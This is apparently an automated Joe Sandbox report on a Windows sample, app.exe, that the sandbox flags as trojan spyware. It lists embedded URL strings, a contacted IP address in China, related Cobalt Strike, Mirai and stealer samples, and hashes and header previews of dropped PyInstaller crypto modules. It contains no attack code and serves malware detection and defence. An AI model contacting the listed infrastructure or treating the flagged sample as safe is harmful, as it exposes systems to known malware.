                                                                                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://stat.ethz.ch/~stahel/lognormal/bioscience.pdfapp.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://cryptography.io/en/latest/changelog/app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://pypi.python.org/pypi/sphinxapp.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://mail.python.org/mailman/listinfo/cryptography-devapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tools.ietf.org/html/rfc6455#section-5.2app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://codecov.io/github/pyca/cryptography?branch=mainapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pypi.org/project/numpy-financialapp.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://docs.python.org/library/itertools.html#recipesapp.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/python-jsonschema/jsonschema/actions?query=workflow%3ACIapp.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://.jpgapp.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaapp.exe, 00000002.00000002.3278572779.00000208332F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.openblas.net/app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://github.com/boppreh/keyboard/issues/20)app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://cryptography.io/en/latest/security.htmlapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://personal.math.ubc.ca/~cbm/aands/page_83.htmapp.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  116.198.204.121
                                                                                                                                                                  		unknownChina
                                                                                                                                                                  		137699CHINATELECOM-JIANGSU-SUQIAN-IDCCHINATELECOMJiangsuSuqianfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1554551
                                                                                                                                                                  Start date and time:2024-11-12 16:49:09 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 8m 50s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:app.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal56.troj.spyw.winEXE@3/196@0/1
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 57
                                                                                                                                                                  • Number of non-executed functions: 279
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                  • VT rate limit hit for: app.exe

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  No simulations

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  No context

                                                                                                                                                                  Domains

                                                                                                                                                                  No context

                                                                                                                                                                  ASNs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  CHINATELECOM-JIANGSU-SUQIAN-IDCCHINATELECOMJiangsuSuqianmips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                  • 116.198.200.237
                                                                                                                                                                  TEiot52yrz.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  2PSj0qX4W6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  LtmV2sDcTK.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  QT2hJT3Syn.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  TEiot52yrz.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  2PSj0qX4W6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  LtmV2sDcTK.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  QT2hJT3Syn.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                  • 116.198.231.169
                                                                                                                                                                  gOEF4WOJ3c.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 116.198.238.210

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  No context

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd231210-10-Creal-33652f.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                    SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        dll.dll.0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                          dll.dll.0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                            explorer.exe.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              00#U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                prank.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.5539.23420.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    SecuriteInfo.com.FileRepMalware.5539.23420.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pyd231210-10-Creal-33652f.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                dll.dll.0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  dll.dll.0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    explorer.exe.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      00#U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        prank.exeGet hashmaliciousDiscord Token StealerBrowse

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                          Entropy (8bit):4.6989965032233245
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:v9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDPM0OcX6gY/7ECFV:39damqT3ThITst0E5DPKcqgY/79X
                                                                                                                                                                                                          MD5:56976443600793FF2302EE7634E496B3
                                                                                                                                                                                                          SHA1:018CE9250732A1794BBD0BDB8164061022B067AA
                                                                                                                                                                                                          SHA-256:10F461A94C3D616C19FF1A88DEC1EFEA5194F7150F5D490B38AC4E1B31F673DD
                                                                                                                                                                                                          SHA-512:A764C636D5D0B878B91DC61485E8699D7AA36F09AA1F0BD6AF33A8652098F28AEB3D7055008E56EBFC012BD3EA0868242A72E44DED0C83926F13D16866C31415
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: 231210-10-Creal-33652f.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: dll.dll.0.dll, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: dll.dll.0.dll, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: explorer.exe.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 00#U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: prank.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.5539.23420.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.5539.23420.exe, Detection: malicious, Browse
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...L...L...L......L.q.M...L..M...L...M...L.q.I...L.q.H...L.q.O...L...D...L...L...L.......L...N...L.Rich..L.........PE..d....y.e.........." ...#............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13824
                                                                                                                                                                                                          Entropy (8bit):5.047528837102683
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:SF/1nb2eqCQtkluknuz4ceS4QDuEA7cqgYvEP:o2P6luLtn4QDHmgYvEP
                                                                                                                                                                                                          MD5:30F13366926DDC878B6D761BEC41879E
                                                                                                                                                                                                          SHA1:4B98075CCBF72A6CBF882B6C5CADEF8DC6EC91DB
                                                                                                                                                                                                          SHA-256:19D5F8081552A8AAFE901601D1FF5C054869308CEF92D03BCBE7BD2BB1291F23
                                                                                                                                                                                                          SHA-512:BDCEC85915AB6EC1D37C1D36B075AE2E69AA638B80CD08971D5FDFD9474B4D1CF442ABF8E93AA991F5A8DCF6DB9D79FB67A9FE7148581E6910D9C952A5E166B4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: 231210-10-Creal-33652f.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: dll.dll.0.dll, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: dll.dll.0.dll, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: explorer.exe.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 00#U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: prank.exe, Detection: malicious, Browse
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\Y..2...2...2......2.i.3...2...3...2...3...2.i.7...2.i.6...2.i.1...2...:...2...2...2.......2...0...2.Rich..2.........PE..d....y.e.........." ...#............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13312
                                                                                                                                                                                                          Entropy (8bit):5.0513840905718395
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:7XF/1nb2eqCQtkXnFYIrWjz0YgWDbu5Do0vdvZt49lkVcqgYvEMN:L2P6XTr0zXgWDbui0vdvZt49MgYvEMN
                                                                                                                                                                                                          MD5:CDF7D583B5C0150455BD3DAD43A6BF9B
                                                                                                                                                                                                          SHA1:9EE9B033892BEB0E9641A67F456975A78122E4FA
                                                                                                                                                                                                          SHA-256:4CA725A1CB10672EE5666ED2B18E926CAAE1A8D8722C14AB3BE2D84BABF646F6
                                                                                                                                                                                                          SHA-512:96123559D21A61B144E2989F96F16786C4E94E5FA4DDA0C018EAA7FEFFA61DD6F0ADFA9815DF9D224CDEBE2E7849376D2A79D5A0F51A7F3327A2FAA0A444CE9C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\Y..2...2...2......2.i.3...2...3...2...3...2.i.7...2.i.6...2.i.1...2...:...2...2...2.......2...0...2.Rich..2.........PE..d....y.e.........." ...#............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):12800
                                                                                                                                                                                                          Entropy (8bit):5.1050594710160535
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/PTF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDmO8jcX6gRth2h:/LsiHfq5poUkJ97zIDmOucqgRvE
                                                                                                                                                                                                          MD5:7918BFE07DCB7AD21822DBAAA777566D
                                                                                                                                                                                                          SHA1:964F5B172759538C4E9E9131CE4BB39885D79842
                                                                                                                                                                                                          SHA-256:C00840D02ADA7031D294B1AB94A5F630C813AAE6897F18DD66C731F56931868E
                                                                                                                                                                                                          SHA-512:D4A05AB632D4F0EB0ED505D803F6A5C0DBE5117D12BA001CE820674903209F7249B690618555F9C061DB58BED1E03BE58AD5D5FE3BC35FC96DF27635639ABF25
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............l...l...l......l.q.m...l..m...l...m...l.q.i...l.q.h...l.q.o...l...d...l...l...l.......l...n...l.Rich..l.................PE..d....y.e.........." ...#............P.....................................................`.........................................P8..p....8..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):36352
                                                                                                                                                                                                          Entropy (8bit):6.55587798283519
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:Of+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuTLg4HPy:WqWB7YJlmLJ3oD/S4j990th9VTsC
                                                                                                                                                                                                          MD5:4B032DA3C65EA0CFBDEB8610C4298C51
                                                                                                                                                                                                          SHA1:541F9F8D428F4518F96D44BB1037BC348EAE54CF
                                                                                                                                                                                                          SHA-256:4AEF77E1359439748E6D3DB1ADB531CF86F4E1A8E437CCD06E8414E83CA28900
                                                                                                                                                                                                          SHA-512:2667BF25FD3BF81374750B43AFC5AEFF839EC1FF6DFC3FDD662F1D34A5924F69FC513EA3CD310991F85902A19ADA8B58DED9A9ED7B5D631563F62EA7F2624102
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...L...L...L......L.q.M...L..M...L...M...L.q.I...L.q.H...L.q.O...L...D...L...L...L.......L...N...L.Rich..L.........PE..d....y.e.........." ...#.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):15872
                                                                                                                                                                                                          Entropy (8bit):5.2919328525651945
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:oJBjJPqZkEPYinXKccxrEWx4xLquhS3WQ67EIfD4A1ccqgwYUMvEW:6URwin7mrEYCLEGd7/fDnwgwYUMvE
                                                                                                                                                                                                          MD5:57E4DF965E41B1F385B02F00EA08AE20
                                                                                                                                                                                                          SHA1:583B08C3FC312C8943FECDDD67D6D0A5FC2FF98B
                                                                                                                                                                                                          SHA-256:3F64DFFEC486DCF9A2E80CB9D96251B98F08795D5922D43FB69F0A5AC2340FC2
                                                                                                                                                                                                          SHA-512:48C3F78AF4E35BFEF3B0023A8039CF83E6B2E496845A11B7A2C2FA8BB62C7CCDE52158D4D37755584716220C34BBF379ECE7F8E3439B009AD099B1890B42A3D9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|X...................i.......................i.......i.......i.......................................Rich....................PE..d....y.e.........." ...#. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                          Entropy (8bit):5.565187477275172
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:MeDd9Vk3yQ5f8vjVKChhXoJDkq6NS7oE2DDHlWw2XpmdcqgwNeecBU8:1k/5cj4shXED+o2Du8zgwNeO8
                                                                                                                                                                                                          MD5:F9C93FA6CA17FDF4FF2F13176684FD6C
                                                                                                                                                                                                          SHA1:6B6422B4CAF157147F7C0DD4B4BAB2374BE31502
                                                                                                                                                                                                          SHA-256:E9AEBB6F17BA05603E0763DFF1A91CE9D175C61C1C2E80F0881A0DEE8CFFBE3A
                                                                                                                                                                                                          SHA-512:09843E40E0D861A2DEE97320779C603550433BC9AB9402052EA284C6C74909E17CE0F6D3FDBA983F5EB6E120E2FE0C2B087420E138760BB0716D2999C10935C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\Y..2...2...2......2.i.3...2...3...2...3...2.i.7...2.i.6...2.i.1...2...:...2...2...2.......2...0...2.Rich..2.........PE..d....y.e.........." ...#."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20992
                                                                                                                                                                                                          Entropy (8bit):6.058843128972375
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:fHU/5cJMOZA0nmwBD+XpJgLa0Mp8Qhg4P2llyM:QK1XBD+DgLa1qTi
                                                                                                                                                                                                          MD5:E4969D864420FEB94F54CEF173D0AD4D
                                                                                                                                                                                                          SHA1:7F8FE4225BB6FD37F84EBCE8E64DF7192BA50FB6
                                                                                                                                                                                                          SHA-256:94D7D7B43E58170CAEA4520D7F741D743BC82B59BE50AA37D3D2FB7B8F1BB061
                                                                                                                                                                                                          SHA-512:F02F02A7DE647DDA723A344DBB043B75DA54D0783AE13E5D25EEC83072EA3B2375F672B710D6348D9FC829E30F8313FA44D5C28B4D65FDA8BB863700CAE994B7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
